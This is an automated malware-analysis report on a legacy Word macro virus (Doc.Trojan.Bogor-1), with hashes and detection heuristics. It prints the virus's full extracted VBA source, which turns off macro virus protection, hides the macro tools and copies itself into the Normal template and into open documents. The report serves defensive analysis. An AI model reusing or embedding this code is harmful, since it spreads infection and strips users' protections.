Office (OLE) malware analysis — malicious · 49a27201802366d4

MALICIOUS

Office (OLE)

39.5 KB Created: 1999-09-10 02:21:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: cfc90fb73d4f005a2826cf3b10cb1504 SHA-1: defbed371cf6122bcae908ce685b7b860ac9e76e SHA-256: 49a27201802366d453a8c8dbc077618eb01842f23093f86d90fb972a41cf754f

248 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample exhibits characteristics of a legacy WordBasic macro virus and contains VBA macros, specifically an AutoOpen macro, which is a common technique for executing malicious code upon document opening. ClamAV detections confirm this as a known malware variant, 'Doc.Trojan.Bogor-1'. The VBA script attempts to disable macro security features and manipulate command bars, suggesting an intent to conceal its malicious activity and potentially download or execute further payloads.

Heuristics 5

ClamAV: Doc.Trojan.Bogor-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Bogor-1
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
      Application.OrganizerCopy Source:=Ad.FullName, _
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7691 bytes
SHA-256: `04c05615ca5567bab16097386afce8e1f061bbd4a575fb89e532eec8923f618b`
Detection ClamAV: Doc.Trojan.Bogor-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "IPBBogor" Public AlAsal Public DokSave Public Norok Public Dokok Sub CyInit() Attribute CyInit.VB_Description = "Bogor Agriculture University" Attribute CyInit.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.CyInit" AlAsal = Application.DisplayAlerts Application.DisplayAlerts = wdAlertsNone Call Tahan CommandBars("Visual Basic").Visible = False CommandBars("Visual Basic").Enabled = False CommandBars("Visual Basic").Protection = msoBarNoChangeVisible CommandBars("Visual Basic").Protection = msoBarNoCustomize On Error Resume Next CommandBars("Tools").Controls("Macro").Delete CustomizationContext = NormalTemplate FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable On Error GoTo 0 End Sub Sub CyClose() Attribute CyClose.VB_Description = "Bogor Agriculture University" Attribute CyClose.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.CyClose" Application.DisplayAlerts = AlAsal End Sub Sub Dok2Nor() Attribute Dok2Nor.VB_Description = "Bogor Agriculture University" Attribute Dok2Nor.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Dok2Nor" Call Tahan On Error GoTo Erw1 Norok = False Set Ad = ActiveDocument Set NT = NormalTemplate On Error GoTo Erh1a For i = 1 To NT.VBProject.VBComponents.Count NMacr = NT.VBProject.VBComponents(i).Name If NMacr = "IPBBogor" Then Norok = True If (NMacr <> "IPBBogor") And (NMacr <> "ThisDocument") Then Application.OrganizerDelete Source:=NT.FullName, _ Name:=NMacr, Object:=wdOrganizerObjectProjectItems End If Next i Erh1a: If Norok = False Then On Error GoTo Erh1 Application.OrganizerCopy Source:=Ad.FullName, _ Destination:=NT.FullName, Name:= _ "IPBBogor", Object:=wdOrganizerObjectProjectItems Templates(NT.FullName).Save Erh1: End If Erw1: End Sub Sub Nor2Dok() Attribute Nor2Dok.VB_Description = "Bogor Agriculture University" Attribute Nor2Dok.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Nor2Dok" On Error GoTo Erw2 DokSave = 0 Dokok = False Set Ad = ActiveDocument Set NT = NormalTemplate On Error GoTo Erh2a For i = 1 To Ad.VBProject.VBComponents.Count NMacr = Ad.VBProject.VBComponents(i).Name If NMacr = "IPBBogor" Then Dokok = True NMacr = NT.VBProject.VBComponents(i).Name If NMacr = "IPBBogor" Then Dokok = True If (NMacr <> "IPBBogor") And (NMacr <> "ThisDocument") And (NMacr <> "Reference to Normal") Then Application.OrganizerDelete Source:=Ad.FullName, _ Name:=NMacr, Object:=wdOrganizerObjectProjectItems End If Next i Erh2a: If Dokok = False Then On Error GoTo Erh2 Application.OrganizerCopy Source:=NT.FullName, _ Destination:=Ad.FullName, Name:= _ "IPBBogor", Object:=wdOrganizerObjectProjectItems DokSave = 1 Erh2: End If Erw2: End Sub Sub Cyber() Attribute Cyber.VB_Description = "Bogor Agriculture University" Attribute Cyber.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Cyber" Call CyInit Call Dok2Nor Call CyClose End Sub Sub Tahan() Attribute Tahan.VB_Description = "Bogor Agriculture University" Attribute Tahan.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Tahan" With Options .VirusProtection = False .SaveNormalPrompt = True End With End Sub Sub Simpan() Attribute Simpan.VB_Description = "Bogor Agriculture University" Attribute Simpan.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Simpan" On Error GoTo Erh4 Set Ad = ActiveDocument If DokSave = 1 Then Ad.SaveAs FileName:=Ad.Name, FileFormat:=wdFormatDocument End If Erh4: End Sub Sub AutoOpen() Attribute AutoOpen.VB_Description = "Bogor Agriculture University" Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.AutoOpen" Call Cyber End Sub Sub FileClose() Attribute FileClose.VB_Description = "Bogor Agriculture University" Attribute FileClose.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.FileClose" Call CyInit Call Dok2Nor Call Nor2Dok Call CyClose WordBasic.FileClose End Sub Sub FileOpen() Attribute FileOpen.VB_Description = "Bogor Agriculture University" Attribute FileOpen.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.FileOpen" Call Cyber Dialogs(wdDialogFileOpen).Show Call CyInit Call Nor2Dok Call Simpan Call CyClose End Sub Sub FileSaveAs() Attribute FileSaveAs.VB_Description = "Bogor Agriculture University" Attribute FileSaveAs.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.FileSaveAs" Call CyInit Call Dok2Nor Call Nor2Dok Call CyClose Dialogs(wdDialogFileSaveAs).Show End Sub Sub FileSave() Attribute FileSave.VB_Description = "Bogor Agriculture University" Attribute FileSave.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.FileSave" Call CyInit Call Dok2Nor Call Nor2Dok Call CyClose On Error GoTo Errh1 If ActiveDocument.Saved = False Then ActiveDocument.Save Errh1: End Sub Sub HelpAbout() Attribute HelpAbout.VB_Description = "Bogor Agriculture University" Attribute HelpAbout.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.HelpAbout" On Error GoTo Erw3 MsgBox "Reformasi, YES!", 48 Help wdHelpAbout Erw3: End Sub Sub FileExit() Attribute FileExit.VB_Description = "Bogor Agriculture University" Attribute FileExit.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.FileExit" Call CyInit Call Dok2Nor Call Nor2Dok On Error GoTo Erw4 Erw4: Call CyClose WordBasic.FileExit End Sub Sub ToolsOptions() Attribute ToolsOptions.VB_Description = "Bogor Agriculture University" Attribute ToolsOptions.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.ToolsOptions" Dialogs(wdDialogToolsOptions).Show Call Cyber End Sub Sub FileNew() Attribute FileNew.VB_Description = "Bogor Agriculture University" Attribute FileNew.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.FileNew" Call Cyber Dialogs(wdDialogFileNew).Show End Sub Sub FileTemplates() Attribute FileTemplates.VB_Description = "Bogor Agriculture University" Attribute FileTemplates.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.FileTemplates" Call Cyber End Sub Sub ToolsMacro() Attribute ToolsMacro.VB_Description = "Bogor Agriculture University" Attribute ToolsMacro.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.ToolsMacro" Call Cyber End Sub Sub ToolsCustomize() Attribute ToolsCustomize.VB_Description = "Bogor Agriculture University" Attribute ToolsCustomize.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.ToolsCustomize" Call Cyber End Sub Sub ToolsCustomizeKeyboard() Attribute ToolsCustomizeKeyboard.VB_Description = "Bogor Agriculture University" Attribute ToolsCustomizeKeyboard.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.ToolsCustomizeKeyboard" Call Cyber End Sub Sub ViewVBCode() Attribute ViewVBCode.VB_Description = "Bogor Agriculture University" Attribute ViewVBCode.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.ViewVBCode" Call Cyber End Sub Sub Organizer() Attribute Organizer.VB_Description = "Bogor Agriculture University" Attribute Organizer.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Organizer" End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.